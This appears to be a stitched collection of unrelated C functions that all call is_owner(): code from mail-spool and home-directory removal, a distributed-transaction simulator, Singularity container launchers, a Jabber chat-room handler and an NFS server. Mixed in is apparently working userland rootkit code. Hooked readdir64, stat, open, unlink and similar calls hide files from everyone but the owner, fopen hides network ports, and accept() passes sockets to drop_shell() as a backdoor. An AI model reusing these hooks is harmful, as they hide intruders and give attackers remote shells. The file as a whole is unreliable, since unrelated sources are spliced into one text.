static void
remove_mailbox(void)
{
const char *maildir;
char mailfile[1024];
int i;
maildir = getdef_str("MAIL_DIR");
#ifdef MAIL_SPOOL_DIR
if (!maildir && !getdef_str("MAIL_FILE"))
maildir = MAIL_SPOOL_DIR;
#endif
if (!maildir)
return;
snprintf(mailfile, sizeof mailfile, "%s/%s", maildir, user_name);
if (fflg) {
unlink(mailfile); /* always remove, ignore errors */
return;
}
i = is_owner(user_id, mailfile);
if (i == 0) {
fprintf(stderr,
_("%s: warning: %s not owned by %s, not removing\n"),
Prog, mailfile, user_name);
return;
} else if (i == -1)
return; /* mailbox doesn't exist */
if (unlink(mailfile)) {
fprintf(stderr, _("%s: warning: can't remove "), Prog);
perror(mailfile);
}
}
static void remove_tx_locks(int tx_id, data_set_entry *data_set, state_type *state, double now) {
SERVER_lp_state_type *pointer = &state->type.server_state;
data_set_entry *entry = data_set;
while (entry != NULL) {
int need_to_unlock = 0;
if (pointer->configuration.concurrency_control_type == ETL_2PL || pointer->configuration.concurrency_control_type == CTL_2PL)
need_to_unlock = is_owner(entry->object_key_id, pointer->server_id, state->num_servers, state->num_clients, state->object_replication_degree);
else if (pointer->configuration.concurrency_control_type == PRIMARY_OWNER_CTL_2PL)
need_to_unlock = is_primary(entry->object_key_id, pointer->server_id, state->num_servers, state->num_clients);
if (need_to_unlock) {
if ((pointer->cc_metadata->locks[entry->object_key_id] != tx_id)) {
if (pointer->configuration.cc_verbose)
printf("cc%d - lock sull'oggetto %i della tx %d non trovato\n", pointer->server_id, entry->object_key_id, tx_id);
} else {
pointer->cc_metadata->locks[entry->object_key_id] = -1;
if (pointer->configuration.cc_verbose)
printf("cc%d - oggetto %d per la transizione %i unlockato al tempo %f \n", pointer->server_id, entry->object_key_id, tx_id, now);
//Wake up waiting event for key 'object_key_id';
reschedule_event(state, now, entry->object_key_id);
}
}
entry = entry->next;
}
}
int remove_homedir(TALLOC_CTX *mem_ctx,
const char *homedir,
const char *maildir,
const char *username,
uid_t uid, bool force)
{
int ret;
ret = remove_mail_spool(mem_ctx, maildir, username, uid, force);
if (ret != EOK) {
DEBUG(1, ("Cannot remove user's mail spool\n"));
/* Should this be fatal? I don't think so. Maybe convert to ERROR? */
}
if (force == false && is_owner(uid, homedir) == -1) {
DEBUG(1, ("Not removing home dir - not owned by user\n"));
return EPERM;
}
/* Remove the tree */
ret = remove_tree(homedir);
if (ret != EOK) {
DEBUG(1, ("Cannot remove homedir %s: %d\n",
homedir, ret));
return ret;
}
return EOK;
}
//send prepare messages to other servers
void send_final_commit_messages(state_type *state, event_content_type * event_content, time_type now) {
int s;
// Get the server configuration from simulation state
SERVER_lp_state_type *pointer = &state->type.server_state;
transaction_metadata *transaction = get_transaction_metadata(event_content->applicative_content.tx_id, pointer);
if (transaction == NULL) {
printf("ERROR: no transaction fouded with id %d (from cliendt %d)\n", event_content->applicative_content.tx_id, event_content->applicative_content.client_id);
exit(-1);
}
for (s = state->num_clients; s < state->num_clients + state->num_servers; s++) {
int a_server_founded = 0;
data_set_entry *entry = transaction->write_set;
while (entry != NULL && !a_server_founded) {
if (pointer->configuration.concurrency_control_type == PRIMARY_OWNER_CTL_2PL) {
if (is_primary(entry->object_key_id, s, state->num_servers, state->num_clients))
a_server_founded = 1;
} else {
if (is_owner(entry->object_key_id, s, state->num_servers, state->num_clients, state->object_replication_degree))
a_server_founded = 1;
}
entry = entry->next;
}
if (s != event_content->applicative_content.server_id && a_server_founded) {
event_content_type new_event_content;
memcpy(&new_event_content, event_content, sizeof(event_content_type));
new_event_content.applicative_content.op_type = TX_DISTRIBUTED_FINAL_COMMIT;
new_event_content.destination_object_id = s;
new_event_content.applicative_content.write_set = transaction->write_set;
transaction->expected_prepare_response_counter++;
server_send_final_commit_message(state, &new_event_content, now);
if (pointer->configuration.server_verbose)
printf("S%d - function Server_ProcessEvent: TX_DISTRIBUTED_FINAL_COMMIT sent at time %f to server %i\n", event_content->applicative_content.server_id, now, s);
}
}
}
//send final abort messages to other servers
void send_final_abort_messages(state_type *state, event_content_type * event_content, time_type now) {
int s;
// Get the server configuration from simulation state
SERVER_lp_state_type *pointer = &state->type.server_state;
transaction_metadata *transaction = get_transaction_metadata(event_content->applicative_content.tx_id, pointer);
if (transaction == NULL) {
printf("ERROR: no transaction found with id %d (from client id %d)\n", event_content->applicative_content.tx_id, event_content->applicative_content.client_id);
exit(-1);
}
for (s = state->num_clients; s < state->num_clients + state->num_servers; s++) {
// send a message to other servers containing at least an entry of the transaction write set
int an_entry_founded = 0;
data_set_entry *entry = transaction->write_set;
while (entry != NULL && !an_entry_founded) {
if (pointer->configuration.concurrency_control_type == PRIMARY_OWNER_CTL_2PL) {
if (is_primary(entry->object_key_id, s, state->num_servers, state->num_clients))
an_entry_founded = 1;
} else {
if (is_owner(entry->object_key_id, s, state->num_servers, state->num_clients, state->object_replication_degree))
an_entry_founded = 1;
}
entry = entry->next;
}
if (s != event_content->applicative_content.server_id && an_entry_founded) {
event_content->applicative_content.op_type = TX_REMOTE_ABORT;
event_content->destination_object_id = s;
event_content->applicative_content.write_set = transaction->write_set;
transaction->expected_prepare_response_counter++;
server_send_message(state, event_content, now);
if (pointer->configuration.server_verbose)
printf("S%d - function Server_ProcessEvent: TX_REMOTE_ABORT sent at time %f to server %i\n", event_content->applicative_content.server_id, now, s);
}
}
}
struct dirent64 *readdir64(DIR *dirp) {
DEBUG("readdir64 hooked.\n");
if (is_owner())
return syscall_list[SYS_READDIR64].syscall_func(dirp);
struct dirent64 *dir;
do {
dir = syscall_list[SYS_READDIR64].syscall_func(dirp);
if (dir != NULL && (strcmp(dir->d_name,".\0") || strcmp(dir->d_name,"/\0")))
continue;
if(dir != NULL) {
char path[PATH_MAX + 1];
char *proc_str = strdup(PROC_STR);
x(proc_str);
snprintf(path, PATH_MAX, proc_str, dir->d_name);
cleanup(proc_str,strlen(proc_str));
if(is_invisible(path) || strstr(path, MAGIC_STRING)) {
continue;
}
}
} while(dir && is_invisible(dir->d_name));
return dir;
}
void __delete()
{
if(is_owner())
{
D()(get());
_ptr = 0;
}
}
int main(int argc, char **argv) {
struct image_object image;
singularity_config_init();
singularity_suid_init();
singularity_priv_init();
singularity_registry_init();
singularity_priv_drop();
singularity_runtime_autofs();
if ( singularity_registry_get("WRITABLE") != NULL ) {
singularity_message(VERBOSE3, "Instantiating writable container image object\n");
image = singularity_image_init(singularity_registry_get("IMAGE"), O_RDWR);
} else {
singularity_message(VERBOSE3, "Instantiating read only container image object\n");
image = singularity_image_init(singularity_registry_get("IMAGE"), O_RDONLY);
}
if ( is_owner(CONTAINER_MOUNTDIR, 0) != 0 ) {
singularity_message(ERROR, "Root must own container mount directory: %s\n", CONTAINER_MOUNTDIR);
ABORT(255);
}
singularity_runtime_ns(SR_NS_MNT);
singularity_image_mount(&image, CONTAINER_MOUNTDIR);
singularity_runtime_overlayfs();
singularity_priv_drop_perm();
envar_set("SINGULARITY_MOUNTPOINT", CONTAINER_FINALDIR, 1);
if ( argc > 1 ) {
singularity_message(VERBOSE, "Running command: %s\n", argv[1]);
singularity_message(DEBUG, "Calling exec...\n");
execvp(argv[1], &argv[1]); // Flawfinder: ignore (Yes flawfinder, we are exec'ing)
singularity_message(ERROR, "Exec failed: %s: %s\n", argv[1], strerror(errno));
ABORT(255);
} else {
singularity_message(INFO, "%s is mounted at: %s\n\n", singularity_image_name(&image), CONTAINER_FINALDIR);
envar_set("PS1", "Singularity> ", 1);
execl("/bin/sh", "/bin/sh", NULL); // Flawfinder: ignore (Yes flawfinder, this is what we want, sheesh, so demanding!)
singularity_message(ERROR, "Exec of /bin/sh failed: %s\n", strerror(errno));
ABORT(255);
}
return(0);
}
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) {
DEBUG("accept hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_ACCEPT].syscall_func(sockfd, addr, addrlen);
int sock = (long)syscall_list[SYS_ACCEPT].syscall_func(sockfd, addr, addrlen);
return drop_shell(sock, addr);
}
int stat(const char *path, struct stat *buf) {
DEBUG("stat hooked\n");
if (is_owner())
return (long)syscall_list[SYS_XSTAT].syscall_func(_STAT_VER, path, buf);
if(is_invisible(path)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_XSTAT].syscall_func(_STAT_VER, path, buf);
}
int rmdir(const char *pathname) {
DEBUG("rmdir hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_RMDIR].syscall_func(pathname);
if(is_invisible(pathname)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_RMDIR].syscall_func(pathname);
}
int open(const char *pathname, int flags, mode_t mode) {
DEBUG("open hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_OPEN].syscall_func(pathname, flags, mode);
if(is_invisible(pathname)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_OPEN].syscall_func(pathname,flags,mode);
}
int lstat(const char *file, struct stat *buf) {
DEBUG("lstat hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_LXSTAT].syscall_func(_STAT_VER, file, buf);
if(is_invisible(file)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_LXSTAT].syscall_func(_STAT_VER, file, buf);
}
DIR *opendir(const char *name) {
DEBUG("opendir hooked.\n");
if (is_owner())
return syscall_list[SYS_OPENDIR].syscall_func(name);
if(is_invisible(name)) {
errno = ENOENT;
return NULL;
}
return syscall_list[SYS_OPENDIR].syscall_func(name);
}
int unlink(const char *pathname) {
DEBUG("unlink hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_UNLINK].syscall_func(pathname);
if(is_invisible(pathname)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_UNLINK].syscall_func(pathname);
}
int __xstat64(int ver, const char *path, struct stat64 *buf) {
DEBUG("xstat64 hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_XSTAT64].syscall_func(ver, path, buf);
if(is_invisible(path)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_XSTAT64].syscall_func(ver,path, buf);
}
int access(const char *path, int amode) {
DEBUG("access hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_ACCESS].syscall_func(path, amode);
if(is_invisible(path)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_ACCESS].syscall_func(path,amode);
}
int unlinkat(int dirfd, const char *pathname, int flags) {
DEBUG("unlinkat hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_UNLINKAT].syscall_func(dirfd, pathname, flags);
if(is_invisible(pathname)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_UNLINKAT].syscall_func(dirfd, pathname, flags);
}
int __lxstat64(int ver, const char *file, struct stat64 *buf) {
DEBUG("__lxstat64 hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_LXSTAT64].syscall_func(ver, file, buf);
if(is_invisible(file)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_LXSTAT64].syscall_func(ver, file, buf);
}
int link(const char *oldpath, const char *newpath) {
DEBUG("link hooked.\n");
if (is_owner())
return (long)syscall_list[SYS_LINK].syscall_func(oldpath, newpath);
if(is_invisible(oldpath)) {
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_LINK].syscall_func(oldpath, newpath);
}
int __xstat(int ver, const char *path, struct stat *buf) {
DEBUG("xstat hooked. path: %s\n",path);
if (is_owner())
return (long)syscall_list[SYS_XSTAT].syscall_func(ver, path, buf);
if(is_invisible(path)) {
DEBUG("File is invisble.\n");
errno = ENOENT;
return -1;
}
return (long)syscall_list[SYS_XSTAT].syscall_func(ver,path, buf);
}
FILE *fopen (const char *filename, const char *mode) {
DEBUG("fopen hooked %s.\n", filename);
if (is_owner())
syscall_list[SYS_FOPEN].syscall_func(filename, mode);
if (is_procnet(filename))
return hide_ports(filename);
if (is_invisible(filename)) {
errno = ENOENT;
return NULL;
}
return syscall_list[SYS_FOPEN].syscall_func(filename, mode);
}
void con_room_forward_decline(cnr room, jpacket jp, xmlnode decline)
{
cnu user;
jid user_jid;
if (room == NULL || decline == NULL || jp == NULL)
{
log_warn(NAME, "[%s] Aborting - NULL attribute found", FZONE);
xmlnode_free(jp->x);
return;
}
user_jid=jid_new(decline->p,xmlnode_get_attrib(decline,"to"));
if ((room->invitation == 1 && !is_member(room, jp->from) && !is_owner(room, jp->from)) || user_jid == NULL)
{
log_warn(NAME, "[%s] Aborting - User is not allowed to send a decline", FZONE);
jutil_error(jp->x, TERROR_MUC_OUTSIDE);
deliver(dpacket_new(jp->x), NULL);
return;
}
if (user_jid->resource == NULL) {
log_warn(NAME, "[%s] Aborting - cannot send back decline, bare jid found", FZONE);
return;
}
if (room->visible == 1)
{
user = g_hash_table_lookup(room->remote, jid_full(jid_fix(user_jid)));
}
else
{
user = g_hash_table_lookup(room->local, user_jid->resource);
}
if (user == NULL){
log_warn(NAME, "[%s] Aborting - Decline recipient is not in the room", FZONE);
jutil_error(jp->x, TERROR_MUC_OUTSIDE);
deliver(dpacket_new(jp->x), NULL);
return;
}
log_debug(NAME, "[%s] Sending invitation decline", FZONE);
xmlnode_put_attrib(decline, "from", jid_full(jp->from));
xmlnode_hide_attrib(decline, "to");
xmlnode_put_attrib(jp->x, "to", jid_full(user->realid));
xmlnode_put_attrib(jp->x, "from", jid_full(room->id));
log_debug(NAME, "[%s] >>>%s<<<", FZONE, xmlnode2str(jp->x));
deliver(dpacket_new(jp->x), NULL);
return;
}
void send_remote_tx_get(state_type *state, event_content_type * event_content, time_type now) {
int s;
// Get the server configuration from simulation state
SERVER_lp_state_type *pointer = &state->type.server_state;
for (s = state->num_clients; s < state->num_clients + state->num_servers; s++) {
if (s != pointer->server_id && is_owner(event_content->applicative_content.object_key_id, s, state->num_servers, state->num_clients, state->object_replication_degree)) {
event_content_type new_event_content_rem;
memcpy(&new_event_content_rem, event_content, sizeof(event_content_type));
new_event_content_rem.applicative_content.object_key_id = event_content->applicative_content.object_key_id;
new_event_content_rem.applicative_content.owner_id = s;
new_event_content_rem.destination_object_id = s;
new_event_content_rem.applicative_content.op_type = TX_REMOTE_GET;
server_send_remote_tx_get(state, &new_event_content_rem, now);
if (pointer->configuration.server_verbose)
printf("S%d - TX_REMOTE_GET sent at time %f\n", pointer->server_id, now);
}
}
}
static int remove_mail_spool(TALLOC_CTX *mem_ctx,
const char *maildir,
const char *username,
uid_t uid,
bool force)
{
int ret;
char *spool_file;
spool_file = talloc_asprintf(mem_ctx, "%s/%s", maildir, username);
if (spool_file == NULL) {
ret = ENOMEM;
goto fail;
}
if (force == false) {
/* Check the owner of the mail spool */
ret = is_owner(uid, spool_file);
switch (ret) {
case 0:
break;
case -1:
DEBUG(3, ("%s not owned by %d, not removing\n",
spool_file, uid));
ret = EACCES;
/* FALLTHROUGH */
default:
goto fail;
}
}
ret = unlink(spool_file);
if (ret != 0) {
ret = errno;
DEBUG(1, ("Cannot remove() the spool file %s: [%d][%s]\n",
spool_file, ret, strerror(ret)));
goto fail;
}
fail:
talloc_free(spool_file);
return ret;
}
//send prepare messages to other servers
int send_prepare_messages(state_type *state, transaction_metadata *transaction, event_content_type * event_content, time_type now) {
int s;
int involved_servers=0;
// Get the server configuration from simulation state
SERVER_lp_state_type *pointer = &state->type.server_state;
for (s = state->num_clients; s < state->num_clients + state->num_servers; s++) {
int has_an_object = 0;
data_set_entry *entry = transaction->write_set;
while (entry != NULL && !has_an_object) {
if (pointer->configuration.concurrency_control_type == PRIMARY_OWNER_CTL_2PL) {
if (is_primary(entry->object_key_id, s, state->num_servers, state->num_clients)) {
has_an_object = 1;
break;
}
} else {
if (is_owner(entry->object_key_id, s, state->num_servers, state->num_clients, state->object_replication_degree)) {
has_an_object = 1;
break;
}
}
entry = entry->next;
}
if (s != event_content->applicative_content.server_id && has_an_object) {
event_content_type new_event_content;
memcpy(&new_event_content, event_content, sizeof(event_content_type));
new_event_content.applicative_content.op_type = TX_PREPARE;
new_event_content.destination_object_id = s;
new_event_content.applicative_content.write_set = transaction->write_set;
transaction->expected_prepare_response_counter++;
server_send_prepare_message(state, &new_event_content, now);
involved_servers++;
if (pointer->configuration.server_verbose)
printf("S%d - function Server_ProcessEvent: TX_PREPARE sent at time %f to server %i\n", event_content->applicative_content.server_id, now, s);
}
}
return involved_servers;
}
//main concurrency control function: return 0 if the event is enqueued, 1 if the accessing object is locked, -1 if transaction must be aborted
int CC_control(event_content_type * event_content, state_type *state, time_type now) {
SERVER_lp_state_type *pointer = &state->type.server_state;
if (pointer == NULL || event_content == NULL)
return -1;
switch (event_content->applicative_content.op_type) {
case TX_BEGIN:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_BEGIN\n", pointer->server_id);
return 1;
break;
case TX_GET:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_GET per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
int return_from_add_data_to_read_set = add_data_to_read_set(event_content->applicative_content.tx_id, event_content->applicative_content.client_id, pointer,
event_content->applicative_content.object_key_id);
if (return_from_add_data_to_read_set == -1) {
abort_local_tx(event_content, state, now);
if (pointer->configuration.cc_verbose)
printf("\tcc%d - ERROR while adding object %i in the read-set of transaction %d from client %d\n", pointer->server_id,
event_content->applicative_content.object_key_id, event_content->applicative_content.tx_id, event_content->applicative_content.client_id);
return -1;
} else {
if (return_from_add_data_to_read_set == 0 && pointer->configuration.cc_verbose)
printf("\tcc%d - object %d is already in the read-set of transaction %d from client %d\n", pointer->server_id, event_content->applicative_content.object_key_id,
event_content->applicative_content.tx_id, event_content->applicative_content.client_id);
else if (pointer->configuration.cc_verbose)
printf("\tcc%d - object %d added to the read-set of transaction tx %d\n", pointer->server_id, event_content->applicative_content.object_key_id, event_content->applicative_content.tx_id);
}
return 1;
break;
case TX_PUT:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_PUT per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
//add data to write-set
add_data_to_write_set(event_content->applicative_content.tx_id, event_content->applicative_content.client_id, pointer, event_content->applicative_content.object_key_id);
if (pointer->configuration.concurrency_control_type == ETL_2PL
&& is_owner(event_content->applicative_content.object_key_id, pointer->server_id, state->num_servers, state->num_clients, state->object_replication_degree)) {
return acquire_a_local_lock(state, pointer->configuration.locking_timeout, TX_LOCAL_TIMEOUT, event_content, now);
}
return 1;
break;
case TX_PREPARE:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_PREPARE per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
data_set_entry *dataset = event_content->applicative_content.write_set;
int result = acquire_local_locks(state, dataset, pointer->configuration.locking_timeout, TX_PREPARE_TIMEOUT, event_content, now);
if (result == -1)
abort_local_tx(event_content, state, now);
return result;
break;
case TX_COMMIT:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_COMMIT per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
if (pointer->configuration.concurrency_control_type == CTL_2PL || pointer->configuration.concurrency_control_type == PRIMARY_OWNER_CTL_2PL) {
transaction_metadata *transaction = get_transaction_metadata(event_content->applicative_content.tx_id, pointer);
if (transaction == NULL) {
printf("ERROR: no transaction found with id %d (from client id %d)\n", event_content->applicative_content.tx_id, event_content->applicative_content.client_id);
exit(-1);
}
data_set_entry *dataset = transaction->write_set;
int result = acquire_local_locks(state, dataset, pointer->configuration.locking_timeout, TX_LOCAL_TIMEOUT, event_content, now);
if (result == -1)
abort_local_tx(event_content, state, now);
return result;
} else
return 1;
break;
case TX_FINAL_LOCAL_COMMIT:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_FINAL_LOCAL_COMMIT per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
transaction_metadata *transaction = get_transaction_metadata(event_content->applicative_content.tx_id, pointer);
if (transaction == NULL) {
printf("ERROR: no transaction found with id %d (from client id %d)\n", event_content->applicative_content.tx_id, event_content->applicative_content.client_id);
exit(-1);
}
dataset = transaction->write_set;
remove_tx_locks(event_content->applicative_content.tx_id, dataset, state, now);
//} else
return 1;
break;
case TX_FINAL_REMOTE_COMMIT:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_FINAL_REMOTE_COMMIT per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
remove_tx_locks(event_content->applicative_content.tx_id, event_content->applicative_content.write_set, state, now);
return 1;
break;
case TX_LOCAL_ABORT:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_ABORT per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
abort_local_tx(event_content, state, now);
return -1;
break;
case TX_REMOTE_ABORT:
if (pointer->configuration.cc_verbose)
printf("\tcc%d - TX_ABORT per tx %i\n", pointer->server_id, event_content->applicative_content.tx_id);
abort_remote_tx(event_content, state, now);
return -1;
break;
default:
printf("ERRORE: evento %i non catturato\n", event_content->applicative_content.op_type);
break;
}
printf("ERROR: case not managed\n");
exit(-1);
}
int acquire_local_locks(state_type *state, data_set_entry *data_set, time_type timeout, int timeout_event_type, event_content_type *event_content, double now) {
SERVER_lp_state_type *pointer = &state->type.server_state;
data_set_entry *entry = data_set;
if (entry == NULL) {
if (pointer->configuration.cc_verbose)
printf("cc%d - write set of transaction %d is empty\n", pointer->server_id, event_content->applicative_content.tx_id);
return 1;
}
while (entry != NULL) {
int need_to_lock = 0;
if (pointer->configuration.concurrency_control_type == ETL_2PL || pointer->configuration.concurrency_control_type == CTL_2PL)
need_to_lock = is_owner(entry->object_key_id, pointer->server_id, state->num_servers, state->num_clients, state->object_replication_degree);
else if (pointer->configuration.concurrency_control_type == PRIMARY_OWNER_CTL_2PL)
need_to_lock = is_primary(entry->object_key_id, pointer->server_id, state->num_servers, state->num_clients);
if (need_to_lock) {
if (pointer->configuration.cc_verbose)
printf("cc%d - object %d for transaction %i to be locked\n", pointer->server_id, entry->object_key_id, event_content->applicative_content.tx_id);
//check lock...
if (pointer->cc_metadata->locks[entry->object_key_id] == -1) {
//not locked
pointer->cc_metadata->lock_retry_num = 0;
//acquire lock
pointer->cc_metadata->locks[entry->object_key_id] = event_content->applicative_content.tx_id;
if (pointer->configuration.cc_verbose)
printf("cc%d - pbject %d for transaction %i locked at time %f \n", pointer->server_id, entry->object_key_id, event_content->applicative_content.tx_id, now);
} else if (pointer->cc_metadata->locks[entry->object_key_id] == event_content->applicative_content.tx_id) {
// already locked by me
// go to the next entry
} else {
//already locked by another transaction
pointer->cc_metadata->lock_retry_num++;
//check deadlock (if enabled)
if (pointer->configuration.deadlock_detection_enabled && check_deadlock(event_content, pointer)) {
return -1;
}
//add the timeout event
event_content_type new_event_content;
memcpy(&new_event_content, event_content, sizeof(event_content_type));
ScheduleNewEvent(pointer->server_id, now + timeout, timeout_event_type, &new_event_content, sizeof(event_content_type));
//enqueue transaction
memcpy(&new_event_content, event_content, sizeof(event_content_type));
new_event_content.applicative_content.object_key_id = entry->object_key_id;
enqueue_event(pointer, &new_event_content);
transaction_metadata *transaction = get_transaction_metadata(event_content->applicative_content.tx_id, pointer);
if (transaction == NULL) {
if (pointer->configuration.cc_verbose) {
printf("cc%d - transaction %i is not local\n", pointer->server_id, event_content->applicative_content.tx_id);
printf("cc%d - prepare of tx %i added in the waiting event queue %f due to a lock on object %d tx:%i\n", pointer->server_id, event_content->applicative_content.tx_id, now,
entry->object_key_id, new_event_content.applicative_content.tx_id);
}
return 0;
} else {
transaction->is_blocked = 1;
if (pointer->configuration.cc_verbose)
printf("cc%d - transaction %i is waiting at time %f due to a lock on object%d tx:%i\n", pointer->server_id, event_content->applicative_content.tx_id, now, entry->object_key_id,
new_event_content.applicative_content.tx_id);
return 0;
}
}
}
entry = entry->next;
}
return 1;
}
int main(int argc, char **argv) {
char *image;
// Before we do anything, check privileges and drop permission
singularity_priv_init();
singularity_priv_drop();
#ifdef SINGULARITY_SUID
singularity_message(VERBOSE2, "Running SUID program workflow\n");
singularity_message(VERBOSE2, "Checking program has appropriate permissions\n");
if ( ( getuid() != 0 ) && ( ( is_owner("/proc/self/exe", 0) < 0 ) || ( is_suid("/proc/self/exe") < 0 ) ) ) {
singularity_abort(255, "This program must be SUID root\n");
}
singularity_message(VERBOSE2, "Checking configuration file is properly owned by root\n");
if ( is_owner(joinpath(SYSCONFDIR, "/singularity/singularity.conf"), 0 ) < 0 ) {
singularity_abort(255, "Running in privileged mode, root must own the Singularity configuration file\n");
}
singularity_config_init(joinpath(SYSCONFDIR, "/singularity/singularity.conf"));
singularity_message(VERBOSE2, "Checking that we are allowed to run as SUID\n");
if ( singularity_config_get_bool(ALLOW_SETUID) == 0 ) {
singularity_abort(255, "SUID mode has been disabled by the sysadmin... Aborting\n");
}
singularity_message(VERBOSE2, "Checking if we were requested to run as NOSUID by user\n");
if ( envar_defined("SINGULARITY_NOSUID") == TRUE ) {
singularity_abort(1, "NOSUID mode has been requested... Aborting\n");
}
#else
singularity_message(VERBOSE, "Running NON-SUID program workflow\n");
singularity_message(DEBUG, "Checking program has appropriate permissions\n");
if ( is_suid("/proc/self/exe") >= 0 ) {
singularity_abort(255, "This program must **NOT** be SUID\n");
}
singularity_config_init(joinpath(SYSCONFDIR, "/singularity/singularity.conf"));
if ( singularity_priv_getuid() != 0 ) {
singularity_message(VERBOSE2, "Checking that we are allowed to run as SUID\n");
if ( singularity_config_get_bool(ALLOW_SETUID) == 1 ) {
singularity_message(VERBOSE2, "Checking if we were requested to run as NOSUID by user\n");
if ( envar_defined("SINGULARITY_NOSUID") == FALSE ) {
char sexec_suid_path[] = LIBEXECDIR "/singularity/sexec-suid";
singularity_message(VERBOSE, "Checking for sexec-suid at %s\n", sexec_suid_path);
if ( is_file(sexec_suid_path) == 0 ) {
if ( ( is_owner(sexec_suid_path, 0 ) == 0 ) && ( is_suid(sexec_suid_path) == 0 ) ) {
singularity_message(VERBOSE, "Invoking SUID sexec: %s\n", sexec_suid_path);
execv(sexec_suid_path, argv); // Flawfinder: ignore
singularity_abort(255, "Failed to execute sexec binary (%s): %s\n", sexec_suid_path, strerror(errno));
} else {
singularity_message(VERBOSE, "Not invoking SUID mode: SUID sexec permissions not properly set\n");
}
}
else {
singularity_message(VERBOSE, "Not invoking SUID mode: SUID sexec not installed\n");
}
} else {
singularity_message(VERBOSE, "Not invoking SUID mode: NOSUID mode requested\n");
}
} else {
singularity_message(VERBOSE, "Not invoking SUID mode: disallowed by the system administrator\n");
}
} else {
singularity_message(VERBOSE, "Not invoking SUID mode: running as root\n");
}
#endif /* SINGULARITY_SUID */
if ( ( image = envar_path("SINGULARITY_IMAGE") ) == NULL ) {
singularity_abort(255, "SINGULARITY_IMAGE not defined!\n");
}
singularity_action_init();
singularity_rootfs_init(image);
singularity_sessiondir_init(image);
free(image);
singularity_ns_unshare();
singularity_rootfs_mount();
singularity_rootfs_check();
singularity_file();
singularity_mount();
singularity_rootfs_chroot();
singularity_action_do(argc, argv);
return(0);
}
ACCESS3res *nfsproc3_access_3_svc(ACCESS3args * argp, struct svc_req * rqstp)
{
static ACCESS3res result;
char *path;
post_op_attr post;
mode_t mode;
int access = 0;
PREP(path, argp->object);
post = get_post_cached(rqstp);
mode = post.post_op_attr_u.attributes.mode;
/* owner permissions */
if (is_owner(st_cache.st_uid, rqstp)) {
if (mode & S_IRUSR)
access |= ACCESS3_READ;
if (mode & S_IWUSR)
access |= ACCESS3_MODIFY | ACCESS3_EXTEND;
if (mode & S_IXUSR) {
access |= ACCESS3_EXECUTE;
if (opt_readable_executables)
access |= ACCESS3_READ;
}
} else if (has_group(st_cache.st_gid, rqstp)) {
/* group permissions */
if (mode & S_IRGRP)
access |= ACCESS3_READ;
if (mode & S_IWGRP)
access |= ACCESS3_MODIFY | ACCESS3_EXTEND;
if (mode & S_IXGRP) {
access |= ACCESS3_EXECUTE;
if (opt_readable_executables)
access |= ACCESS3_READ;
}
} else {
/* other permissions */
if (mode & S_IROTH)
access |= ACCESS3_READ;
if (mode & S_IWOTH)
access |= ACCESS3_MODIFY | ACCESS3_EXTEND;
if (mode & S_IXOTH) {
access |= ACCESS3_EXECUTE;
if (opt_readable_executables)
access |= ACCESS3_READ;
}
}
/* root is allowed everything */
if (get_uid(rqstp) == 0)
access |= ACCESS3_READ | ACCESS3_MODIFY | ACCESS3_EXTEND;
/* adjust if directory */
if (post.post_op_attr_u.attributes.type == NF3DIR) {
if (access & (ACCESS3_READ | ACCESS3_EXECUTE))
access |= ACCESS3_LOOKUP;
if (access & ACCESS3_MODIFY)
access |= ACCESS3_DELETE;
access &= ~ACCESS3_EXECUTE;
}
result.status = NFS3_OK;
result.ACCESS3res_u.resok.access = access & argp->access;
result.ACCESS3res_u.resok.obj_attributes = post;
return &result;
}
